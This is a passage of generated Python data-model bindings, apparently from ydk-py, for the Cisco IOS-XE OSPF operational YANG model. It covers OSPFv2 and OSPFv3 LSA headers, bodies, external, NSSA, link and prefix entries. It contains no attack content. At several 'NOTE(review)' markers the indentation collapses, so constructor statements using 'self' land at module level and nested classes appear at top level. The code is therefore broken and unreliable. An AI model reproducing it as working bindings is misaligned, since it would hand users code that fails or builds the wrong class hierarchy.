        self._child_classes = OrderedDict([("ospfv2-topology", ("ospfv2_topology", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Link.Ospfv2Topology))])
        self._leafs = OrderedDict([
            ('link_id', (YLeaf(YType.uint32, 'link-id'), ['int'])),
            ('link_data', (YLeaf(YType.uint32, 'link-data'), ['int'])),
            ('type', (YLeaf(YType.uint8, 'type'), ['int'])),
        ])
        self.link_id = None
        self.link_data = None
        self.type = None

        self.ospfv2_topology = YList(self)
        self._segment_path = lambda: "ospfv2-link" + "[link-id='" + str(self.link_id) + "']" + "[link-data='" + str(self.link_data) + "']"
        self._is_frozen = True

    def __setattr__(self, name, value):
        self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Link, ['link_id', 'link_data', 'type'], name, value)


    class Ospfv2Topology(Entity):
        """Per-topology metric of a link; list keyed by 'mt_id'."""

        _prefix = 'ospf-ios-xe-oper'
        _revision = '2018-02-01'

        def __init__(self):
            super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Link.Ospfv2Topology, self).__init__()

            self.yang_name = "ospfv2-topology"
            self.yang_parent_name = "ospfv2-link"
            self.is_top_level_class = False
            self.has_list_ancestor = True
            self.ylist_key_names = ['mt_id']
            self._child_classes = OrderedDict([])
            self._leafs = OrderedDict([
                ('mt_id', (YLeaf(YType.uint32, 'mt-id'), ['int'])),
                ('metric', (YLeaf(YType.uint16, 'metric'), ['int'])),
            ])
            self.mt_id = None
            self.metric = None
            self._segment_path = lambda: "ospfv2-topology" + "[mt-id='" + str(self.mt_id) + "']"
            self._is_frozen = True

        def __setattr__(self, name, value):
            self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Link.Ospfv2Topology, ['mt_id', 'metric'], name, value)


class Ospfv2Topology(Entity):
    """Summary-LSA per-topology metric directly under the LSA entry."""

    _prefix = 'ospf-ios-xe-oper'
    _revision = '2018-02-01'

    def __init__(self):
        super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Topology, self).__init__()

        self.yang_name = "ospfv2-topology"
        self.yang_parent_name = "area-scope-lsa"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = ['mt_id']
        self._child_classes = OrderedDict([])
        self._leafs = OrderedDict([
            ('mt_id', (YLeaf(YType.uint32, 'mt-id'), ['int'])),
            ('metric', (YLeaf(YType.uint16, 'metric'), ['int'])),
        ])
        self.mt_id = None
        self.metric = None
        self._segment_path = lambda: "ospfv2-topology" + "[mt-id='" + str(self.mt_id) + "']"
        self._is_frozen = True

    def __setattr__(self, name, value):
        self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Topology, ['mt_id', 'metric'], name, value)


class Ospfv2External(Entity):
    """External-LSA per-topology data; list keyed by 'mt_id'.

    __init__ continues on the next source lines (chunk boundary).
    """

    _prefix = 'ospf-ios-xe-oper'
    _revision = '2018-02-01'

    def __init__(self):
        super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2External, self).__init__()

        self.yang_name = "ospfv2-external"
        self.yang_parent_name = "area-scope-lsa"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = ['mt_id']
        self._child_classes = OrderedDict([])
        self._leafs = OrderedDict([
            ('mt_id', (YLeaf(YType.uint32, 'mt-id'), ['int'])),
            ('metric', (YLeaf(YType.uint32, 'metric'), ['int'])),
            ('forwarding_address', (YLeaf(YType.str, 'forwarding-address'), ['str','str'])),
            ('external_route_tag', (YLeaf(YType.uint32, 'external-route-tag'), ['int'])),
        ])
        self.mt_id = None
        self.metric = None
        self.forwarding_address = None
        self.external_route_tag = None
# NOTE(review): newline-stripped generated ydk-py code, reformatted with all
# tokens unchanged. These first statements complete Ospfv2External.__init__.
self._segment_path = lambda: "ospfv2-external" + "[mt-id='" + str(self.mt_id) + "']"
self._is_frozen = True

def __setattr__(self, name, value):
    self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2External, ['mt_id', 'metric', 'forwarding_address', 'external_route_tag'], name, value)


class Ospfv3Lsa(Entity):
    """Decoded OSPFv3 LSA (header + body) of an area-scope LSA entry."""

    _prefix = 'ospf-ios-xe-oper'
    _revision = '2018-02-01'

    def __init__(self):
        super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa, self).__init__()

        self.yang_name = "ospfv3-lsa"
        self.yang_parent_name = "area-scope-lsa"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([
            ("header", ("header", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.Header)),
            ("lsa-body", ("lsa_body", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody)),
        ])
        self._leafs = OrderedDict()

        self.header = OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.Header()
        self.header.parent = self
        self._children_name_map["header"] = "header"

        self.lsa_body = OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody()
        self.lsa_body.parent = self
        self._children_name_map["lsa_body"] = "lsa-body"
        self._segment_path = lambda: "ospfv3-lsa"
        self._is_frozen = True

    def __setattr__(self, name, value):
        self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa, [], name, value)


    class Header(Entity):
        """OSPFv3 LSA header: LSA id, header options, nested lsa-header."""

        _prefix = 'ospf-ios-xe-oper'
        _revision = '2018-02-01'

        def __init__(self):
            super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.Header, self).__init__()

            self.yang_name = "header"
            self.yang_parent_name = "ospfv3-lsa"
            self.is_top_level_class = False
            self.has_list_ancestor = True
            self.ylist_key_names = []
            self._child_classes = OrderedDict([("lsa-header", ("lsa_header", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.Header.LsaHeader))])
            self._leafs = OrderedDict([
                ('lsa_id', (YLeaf(YType.str, 'lsa-id'), ['str','str'])),
                ('lsa_hdr_options', (YLeaf(YType.bits, 'lsa-hdr-options'), ['Bits'])),
            ])
            self.lsa_id = None
            self.lsa_hdr_options = Bits()

            self.lsa_header = OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.Header.LsaHeader()
            self.lsa_header.parent = self
            self._children_name_map["lsa_header"] = "lsa-header"
            self._segment_path = lambda: "header"
            self._is_frozen = True

        def __setattr__(self, name, value):
            self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.Header, ['lsa_id', 'lsa_hdr_options'], name, value)


        class LsaHeader(Entity):
            """Common LSA header leaves (age, type, adv-router, seq, cksum, len)."""

            _prefix = 'ospf-ios-xe-oper'
            _revision = '2018-02-01'

            def __init__(self):
                super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.Header.LsaHeader, self).__init__()

                self.yang_name = "lsa-header"
                self.yang_parent_name = "header"
                self.is_top_level_class = False
                self.has_list_ancestor = True
                self.ylist_key_names = []
                self._child_classes = OrderedDict([])
                self._leafs = OrderedDict([
                    ('age', (YLeaf(YType.uint16, 'age'), ['int'])),
                    ('type', (YLeaf(YType.uint16, 'type'), ['int'])),
                    ('adv_router', (YLeaf(YType.uint32, 'adv-router'), ['int'])),
                    ('seq_num', (YLeaf(YType.str, 'seq-num'), ['str'])),
                    ('checksum', (YLeaf(YType.str, 'checksum'), ['str'])),
                    ('length', (YLeaf(YType.uint16, 'length'), ['int'])),
                ])
                self.age = None
                self.type = None
                self.adv_router = None
                self.seq_num = None
                self.checksum = None
                self.length = None
                self._segment_path = lambda: "lsa-header"
                self._is_frozen = True

            def __setattr__(self, name, value):
                self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.Header.LsaHeader, ['age', 'type', 'adv_router', 'seq_num', 'checksum', 'length'], name, value)


    class LsaBody(Entity):
        """Decoded OSPFv3 LSA body with one container per body variant.

        __init__ continues on the next source lines (chunk boundary).
        """

        _prefix = 'ospf-ios-xe-oper'
        _revision = '2018-02-01'

        def __init__(self):
            super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody, self).__init__()

            self.yang_name = "lsa-body"
            self.yang_parent_name = "ospfv3-lsa"
            self.is_top_level_class = False
            self.has_list_ancestor = True
            self.ylist_key_names = []
            self._child_classes = OrderedDict([
                ("network", ("network", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Network)),
                ("prefix", ("prefix", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Prefix)),
                ("ia-router", ("ia_router", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.IaRouter)),
                ("lsa-external", ("lsa_external", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.LsaExternal)),
                ("nssa", ("nssa", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Nssa)),
                ("link-data", ("link_data", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.LinkData)),
                ("ia-prefix", ("ia_prefix", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.IaPrefix)),
            ])
            self._leafs = OrderedDict([
                ('lsa_flag_options', (YLeaf(YType.bits, 'lsa-flag-options'), ['Bits'])),
                ('lsa_body_flags', (YLeaf(YType.bits, 'lsa-body-flags'), ['Bits'])),
            ])
            self.lsa_flag_options = Bits()
            self.lsa_body_flags = Bits()

            self.network = OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Network()
            self.network.parent = self
            self._children_name_map["network"] = "network"

            self.prefix = OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Prefix()
            self.prefix.parent = self
            self._children_name_map["prefix"] = "prefix"

            self.ia_router = OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.IaRouter()
# NOTE(review): newline-stripped generated ydk-py code, reformatted with all
# tokens unchanged. These first statements complete Ospfv3Lsa.LsaBody.__init__.
self.ia_router.parent = self
self._children_name_map["ia_router"] = "ia-router"

self.lsa_external = OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.LsaExternal()
self.lsa_external.parent = self
self._children_name_map["lsa_external"] = "lsa-external"

self.nssa = OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Nssa()
self.nssa.parent = self
self._children_name_map["nssa"] = "nssa"

self.link_data = OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.LinkData()
self.link_data.parent = self
self._children_name_map["link_data"] = "link-data"

self.ia_prefix = OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.IaPrefix()
self.ia_prefix.parent = self
self._children_name_map["ia_prefix"] = "ia-prefix"
self._segment_path = lambda: "lsa-body"
self._is_frozen = True

def __setattr__(self, name, value):
    self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody, ['lsa_flag_options', 'lsa_body_flags'], name, value)


class Network(Entity):
    """OSPFv3 network-LSA body: attached routers and net options."""

    _prefix = 'ospf-ios-xe-oper'
    _revision = '2018-02-01'

    def __init__(self):
        super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Network, self).__init__()

        self.yang_name = "network"
        self.yang_parent_name = "lsa-body"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])
        self._leafs = OrderedDict([
            ('attached_router', (YLeafList(YType.uint32, 'attached-router'), ['int'])),
            ('lsa_net_options', (YLeaf(YType.bits, 'lsa-net-options'), ['Bits'])),
        ])
        self.attached_router = []
        self.lsa_net_options = Bits()
        self._segment_path = lambda: "network"
        self._is_frozen = True

    def __setattr__(self, name, value):
        self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Network, ['attached_router', 'lsa_net_options'], name, value)


class Prefix(Entity):
    """Inter-area-prefix body: metric plus prefix and its options."""

    _prefix = 'ospf-ios-xe-oper'
    _revision = '2018-02-01'

    def __init__(self):
        super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Prefix, self).__init__()

        self.yang_name = "prefix"
        self.yang_parent_name = "lsa-body"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])
        self._leafs = OrderedDict([
            ('metric', (YLeaf(YType.uint32, 'metric'), ['int'])),
            ('ia_prefix', (YLeaf(YType.str, 'ia-prefix'), ['str'])),
            ('ia_prefix_options', (YLeaf(YType.str, 'ia-prefix-options'), ['str'])),
        ])
        self.metric = None
        self.ia_prefix = None
        self.ia_prefix_options = None
        self._segment_path = lambda: "prefix"
        self._is_frozen = True

    def __setattr__(self, name, value):
        self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Prefix, ['metric', 'ia_prefix', 'ia_prefix_options'], name, value)


class IaRouter(Entity):
    """Inter-area-router body: metric, destination router id, options."""

    _prefix = 'ospf-ios-xe-oper'
    _revision = '2018-02-01'

    def __init__(self):
        super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.IaRouter, self).__init__()

        self.yang_name = "ia-router"
        self.yang_parent_name = "lsa-body"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])
        self._leafs = OrderedDict([
            ('metric', (YLeaf(YType.uint32, 'metric'), ['int'])),
            ('destination_router_id', (YLeaf(YType.uint32, 'destination-router-id'), ['int'])),
            ('lsa_ia_options', (YLeaf(YType.bits, 'lsa-ia-options'), ['Bits'])),
        ])
        self.metric = None
        self.destination_router_id = None
        self.lsa_ia_options = Bits()
        self._segment_path = lambda: "ia-router"
        self._is_frozen = True

    def __setattr__(self, name, value):
        self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.IaRouter, ['metric', 'destination_router_id', 'lsa_ia_options'], name, value)


class LsaExternal(Entity):
    """AS-external-LSA body with its flag container."""

    _prefix = 'ospf-ios-xe-oper'
    _revision = '2018-02-01'

    def __init__(self):
        super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.LsaExternal, self).__init__()

        self.yang_name = "lsa-external"
        self.yang_parent_name = "lsa-body"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([("flags", ("flags", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.LsaExternal.Flags))])
        self._leafs = OrderedDict([
            ('metric', (YLeaf(YType.uint32, 'metric'), ['int'])),
            ('referenced_ls_type', (YLeaf(YType.uint16, 'referenced-ls-type'), ['int'])),
            ('external_prefix', (YLeaf(YType.str, 'external-prefix'), ['str'])),
            ('external_prefix_options', (YLeaf(YType.str, 'external-prefix-options'), ['str'])),
            ('forwarding_address', (YLeaf(YType.str, 'forwarding-address'), ['str','str'])),
            ('external_route_tag', (YLeaf(YType.uint32, 'external-route-tag'), ['int'])),
            ('referenced_link_state_id', (YLeaf(YType.uint32, 'referenced-link-state-id'), ['int'])),
        ])
        self.metric = None
        self.referenced_ls_type = None
        self.external_prefix = None
        self.external_prefix_options = None
        self.forwarding_address = None
        self.external_route_tag = None
        self.referenced_link_state_id = None

        self.flags = OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.LsaExternal.Flags()
        self.flags.parent = self
        self._children_name_map["flags"] = "flags"
        self._segment_path = lambda: "lsa-external"
        self._is_frozen = True

    def __setattr__(self, name, value):
        self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.LsaExternal, ['metric', 'referenced_ls_type', 'external_prefix', 'external_prefix_options', 'forwarding_address', 'external_route_tag', 'referenced_link_state_id'], name, value)


    class Flags(Entity):
        """Single E-flag of the external LSA body."""

        _prefix = 'ospf-ios-xe-oper'
        _revision = '2018-02-01'

        def __init__(self):
            super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.LsaExternal.Flags, self).__init__()

            self.yang_name = "flags"
            self.yang_parent_name = "lsa-external"
            self.is_top_level_class = False
            self.has_list_ancestor = True
            self.ylist_key_names = []
            self._child_classes = OrderedDict([])
            self._leafs = OrderedDict([
                ('e_flag', (YLeaf(YType.boolean, 'e-flag'), ['bool'])),
            ])
            self.e_flag = None
            self._segment_path = lambda: "flags"
            self._is_frozen = True

        def __setattr__(self, name, value):
            self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.LsaExternal.Flags, ['e_flag'], name, value)


class Nssa(Entity):
    """NSSA body wrapper holding the lsa-nssa-external container."""

    _prefix = 'ospf-ios-xe-oper'
    _revision = '2018-02-01'

    def __init__(self):
        super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Nssa, self).__init__()

        self.yang_name = "nssa"
        self.yang_parent_name = "lsa-body"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([("lsa-nssa-external", ("lsa_nssa_external", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal))])
        self._leafs = OrderedDict()

        self.lsa_nssa_external = OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal()
        self.lsa_nssa_external.parent = self
        self._children_name_map["lsa_nssa_external"] = "lsa-nssa-external"
        self._segment_path = lambda: "nssa"
        self._is_frozen = True

    def __setattr__(self, name, value):
        self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Nssa, [], name, value)


    class LsaNssaExternal(Entity):
        """NSSA external LSA body; mirrors LsaExternal's leaf set."""

        _prefix = 'ospf-ios-xe-oper'
        _revision = '2018-02-01'

        def __init__(self):
            super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal, self).__init__()

            self.yang_name = "lsa-nssa-external"
            self.yang_parent_name = "nssa"
            self.is_top_level_class = False
            self.has_list_ancestor = True
            self.ylist_key_names = []
            self._child_classes = OrderedDict([("flags", ("flags", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal.Flags))])
            self._leafs = OrderedDict([
                ('metric', (YLeaf(YType.uint32, 'metric'), ['int'])),
                ('referenced_ls_type', (YLeaf(YType.uint16, 'referenced-ls-type'), ['int'])),
                ('external_prefix', (YLeaf(YType.str, 'external-prefix'), ['str'])),
                ('external_prefix_options', (YLeaf(YType.str, 'external-prefix-options'), ['str'])),
                ('forwarding_address', (YLeaf(YType.str, 'forwarding-address'), ['str','str'])),
                ('external_route_tag', (YLeaf(YType.uint32, 'external-route-tag'), ['int'])),
                ('referenced_link_state_id', (YLeaf(YType.uint32, 'referenced-link-state-id'), ['int'])),
            ])
            self.metric = None
            self.referenced_ls_type = None
            self.external_prefix = None
            self.external_prefix_options = None
            self.forwarding_address = None
            self.external_route_tag = None
            self.referenced_link_state_id = None

            self.flags = OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal.Flags()
            self.flags.parent = self
            self._children_name_map["flags"] = "flags"
            self._segment_path = lambda: "lsa-nssa-external"
            self._is_frozen = True

        def __setattr__(self, name, value):
            self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal, ['metric', 'referenced_ls_type', 'external_prefix', 'external_prefix_options', 'forwarding_address', 'external_route_tag', 'referenced_link_state_id'], name, value)


        class Flags(Entity):
            """Single E-flag of the NSSA external LSA body."""

            _prefix = 'ospf-ios-xe-oper'
            _revision = '2018-02-01'

            def __init__(self):
                super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal.Flags, self).__init__()

                self.yang_name = "flags"
                self.yang_parent_name = "lsa-nssa-external"
                self.is_top_level_class = False
                self.has_list_ancestor = True
                self.ylist_key_names = []
                self._child_classes = OrderedDict([])
                self._leafs = OrderedDict([
                    ('e_flag', (YLeaf(YType.boolean, 'e-flag'), ['bool'])),
                ])
                self.e_flag = None
                self._segment_path = lambda: "flags"
                self._is_frozen = True

            def __setattr__(self, name, value):
                self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal.Flags, ['e_flag'], name, value)


class LinkData(Entity):
    """Link-LSA body: router priority, link-local address, prefix count."""

    _prefix = 'ospf-ios-xe-oper'
    _revision = '2018-02-01'

    def __init__(self):
        super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.LinkData, self).__init__()

        self.yang_name = "link-data"
        self.yang_parent_name = "lsa-body"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])
        self._leafs = OrderedDict([
            ('rtr_priority', (YLeaf(YType.uint8, 'rtr-priority'), ['int'])),
            ('link_local_interface_address', (YLeaf(YType.str, 'link-local-interface-address'), ['str','str'])),
            ('num_of_prefixes', (YLeaf(YType.uint32, 'num-of-prefixes'), ['int'])),
            ('lsa_id_options', (YLeaf(YType.bits, 'lsa-id-options'), ['Bits'])),
        ])
        self.rtr_priority = None
        self.link_local_interface_address = None
        self.num_of_prefixes = None
        self.lsa_id_options = Bits()
        self._segment_path = lambda: "link-data"
        self._is_frozen = True

    def __setattr__(self, name, value):
        self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.LinkData, ['rtr_priority', 'link_local_interface_address', 'num_of_prefixes', 'lsa_id_options'], name, value)


class IaPrefix(Entity):
    """Intra-area-prefix body: referenced LSA identity plus prefix count."""

    _prefix = 'ospf-ios-xe-oper'
    _revision = '2018-02-01'

    def __init__(self):
        super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.IaPrefix, self).__init__()

        self.yang_name = "ia-prefix"
        self.yang_parent_name = "lsa-body"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])
        self._leafs = OrderedDict([
            ('referenced_ls_type', (YLeaf(YType.uint16, 'referenced-ls-type'), ['int'])),
            ('referenced_link_state_id', (YLeaf(YType.uint32, 'referenced-link-state-id'), ['int'])),
            ('referenced_adv_router', (YLeaf(YType.str, 'referenced-adv-router'), ['str','str'])),
            ('num_of_prefixes', (YLeaf(YType.uint16, 'num-of-prefixes'), ['int'])),
        ])
        self.referenced_ls_type = None
        self.referenced_link_state_id = None
        self.referenced_adv_router = None
        self.num_of_prefixes = None
        self._segment_path = lambda: "ia-prefix"
        self._is_frozen = True

    def __setattr__(self, name, value):
        self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.IaPrefix, ['referenced_ls_type', 'referenced_link_state_id', 'referenced_adv_router', 'num_of_prefixes'], name, value)


class Ospfv3Link(Entity):
    """OSPFv3 router-LSA link entry keyed by interface/neighbor ids.

    __init__ continues on the next source lines (chunk boundary).
    """

    _prefix = 'ospf-ios-xe-oper'
    _revision = '2018-02-01'

    def __init__(self):
        super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Link, self).__init__()

        self.yang_name = "ospfv3-link"
        self.yang_parent_name = "area-scope-lsa"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = ['interface_id','neighbor_interface_id','neighbor_router_id']
        self._child_classes = OrderedDict([])
        self._leafs = OrderedDict([
            ('interface_id', (YLeaf(YType.uint32, 'interface-id'), ['int'])),
            ('neighbor_interface_id', (YLeaf(YType.uint32, 'neighbor-interface-id'), ['int'])),
            ('neighbor_router_id', (YLeaf(YType.uint32, 'neighbor-router-id'), ['int'])),
            ('type', (YLeaf(YType.uint8, 'type'), ['int'])),
            ('metric', (YLeaf(YType.uint16, 'metric'), ['int'])),
        ])
        self.interface_id = None
# NOTE(review): newline-stripped generated ydk-py code, reformatted with all
# tokens unchanged. These first statements complete Ospfv3Link.__init__.
self.neighbor_interface_id = None
self.neighbor_router_id = None
self.type = None
self.metric = None
# All three list keys appear as predicates in the XPath segment.
self._segment_path = lambda: "ospfv3-link" + "[interface-id='" + str(self.interface_id) + "']" + "[neighbor-interface-id='" + str(self.neighbor_interface_id) + "']" + "[neighbor-router-id='" + str(self.neighbor_router_id) + "']"
self._is_frozen = True

def __setattr__(self, name, value):
    self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Link, ['interface_id', 'neighbor_interface_id', 'neighbor_router_id', 'type', 'metric'], name, value)


class Ospfv3Prefix(Entity):
    """OSPFv3 prefix entry of an area-scope LSA; list keyed by 'prefix'."""

    _prefix = 'ospf-ios-xe-oper'
    _revision = '2018-02-01'

    def __init__(self):
        super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Prefix, self).__init__()

        self.yang_name = "ospfv3-prefix"
        self.yang_parent_name = "area-scope-lsa"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = ['prefix']
        self._child_classes = OrderedDict([])
        self._leafs = OrderedDict([
            ('prefix', (YLeaf(YType.str, 'prefix'), ['str'])),
            ('prefix_options', (YLeaf(YType.str, 'prefix-options'), ['str'])),
        ])
        self.prefix = None
        self.prefix_options = None
        self._segment_path = lambda: "ospfv3-prefix" + "[prefix='" + str(self.prefix) + "']"
        self._is_frozen = True

    def __setattr__(self, name, value):
        self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Prefix, ['prefix', 'prefix_options'], name, value)


class Ospfv3IaPrefix(Entity):
    """OSPFv3 intra-area prefix entry; list keyed by 'prefix'."""

    _prefix = 'ospf-ios-xe-oper'
    _revision = '2018-02-01'

    def __init__(self):
        super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3IaPrefix, self).__init__()

        self.yang_name = "ospfv3-ia-prefix"
        self.yang_parent_name = "area-scope-lsa"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = ['prefix']
        self._child_classes = OrderedDict([])
        self._leafs = OrderedDict([
            ('prefix', (YLeaf(YType.str, 'prefix'), ['str'])),
            ('prefix_options', (YLeaf(YType.str, 'prefix-options'), ['str'])),
        ])
        self.prefix = None
        self.prefix_options = None
        self._segment_path = lambda: "ospfv3-ia-prefix" + "[prefix='" + str(self.prefix) + "']"
        self._is_frozen = True

    def __setattr__(self, name, value):
